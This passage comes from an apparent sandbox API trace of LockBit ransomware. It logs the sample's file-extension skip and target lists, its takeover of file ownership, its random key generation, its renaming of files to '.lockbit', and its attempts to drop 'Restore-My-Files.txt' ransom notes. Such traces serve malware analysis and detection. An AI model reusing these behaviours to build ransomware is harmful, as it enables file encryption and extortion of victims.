lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.439] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.439] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.439] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.440] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.440] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.440] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.440] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.440] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.440] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png.lockbit") returned 92 [0080.440] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.444] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.444] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.444] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.445] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.445] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.445] RtlFreeAnsiString (AnsiString="\\") [0080.445] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.445] malloc (_Size=0x200) returned 0x77d800 [0080.445] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.445] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.445] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.445] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.446] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.446] CloseHandle (hObject=0x3a0) returned 1 [0080.446] free (_Block=0x77d800) [0080.446] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.446] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.446] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.447] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4955) returned 1 [0080.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.448] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.450] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.450] malloc (_Size=0xce) returned 0x1ff1e60 [0080.450] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xce, FileInformationClass=0xa) returned 0x0 [0080.451] free (_Block=0x1ff1e60) [0080.451] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.451] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.451] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.451] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe8ad00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe8ad00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0080.451] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.451] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.451] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0080.452] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.452] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.452] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.453] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.453] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.454] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.454] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.454] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.454] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.454] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.454] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.454] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.454] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.454] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.454] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.454] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.454] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.454] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.454] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0080.454] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0080.454] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.454] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png") returned=".png" [0080.454] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.455] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.455] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.455] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.456] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.456] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.456] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.456] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.456] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.456] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.456] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.456] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.456] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.456] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.456] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.456] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png.lockbit") returned 98 [0080.456] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.461] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.461] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.461] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.461] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.461] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.461] RtlFreeAnsiString (AnsiString="\\") [0080.461] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0080.461] malloc (_Size=0x200) returned 0x77d800 [0080.462] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.462] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.462] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.462] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.462] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.462] CloseHandle (hObject=0x3ac) returned 1 [0080.462] free (_Block=0x77d800) [0080.463] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.463] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.463] malloc (_Size=0x40068) returned 0x3d70048 [0080.463] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3081) returned 1 [0080.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.464] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.467] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.467] malloc (_Size=0xda) returned 0x1ff1e60 [0080.467] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xda, FileInformationClass=0xa) returned 0x0 [0080.467] free (_Block=0x1ff1e60) [0080.467] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.467] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.467] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.467] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdf278c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdf278c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagecurl.png", cAlternateFileName="")) returned 1 [0080.467] lstrcmpiW (lpString1=".", lpString2="pagecurl.png") returned -1 [0080.467] lstrcmpiW (lpString1="..", lpString2="pagecurl.png") returned -1 [0080.467] PathFindExtensionW (pszPath="pagecurl.png") returned=".png" [0080.468] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.468] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.468] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.468] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.469] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.469] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="pagecurl.png") returned 1 [0080.469] lstrcmpiW (lpString1="ntldr", lpString2="pagecurl.png") returned -1 [0080.470] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="pagecurl.png") returned -1 [0080.470] lstrcmpiW (lpString1="bootsect.bak", lpString2="pagecurl.png") returned -1 [0080.470] lstrcmpiW (lpString1="autorun.inf", lpString2="pagecurl.png") returned -1 [0080.470] lstrcmpiW (lpString1="thumbs.db", lpString2="pagecurl.png") returned 1 [0080.470] lstrcmpiW (lpString1="iconcache.db", lpString2="pagecurl.png") returned -1 [0080.470] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.470] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png") returned=".png" [0080.470] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.470] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.470] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.470] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.471] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.471] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.471] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.471] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.471] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.471] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.471] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.471] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.471] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.471] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.471] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.471] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.471] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png.lockbit") returned 74 [0080.471] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" (normalized: "c:\\program files\\dvd 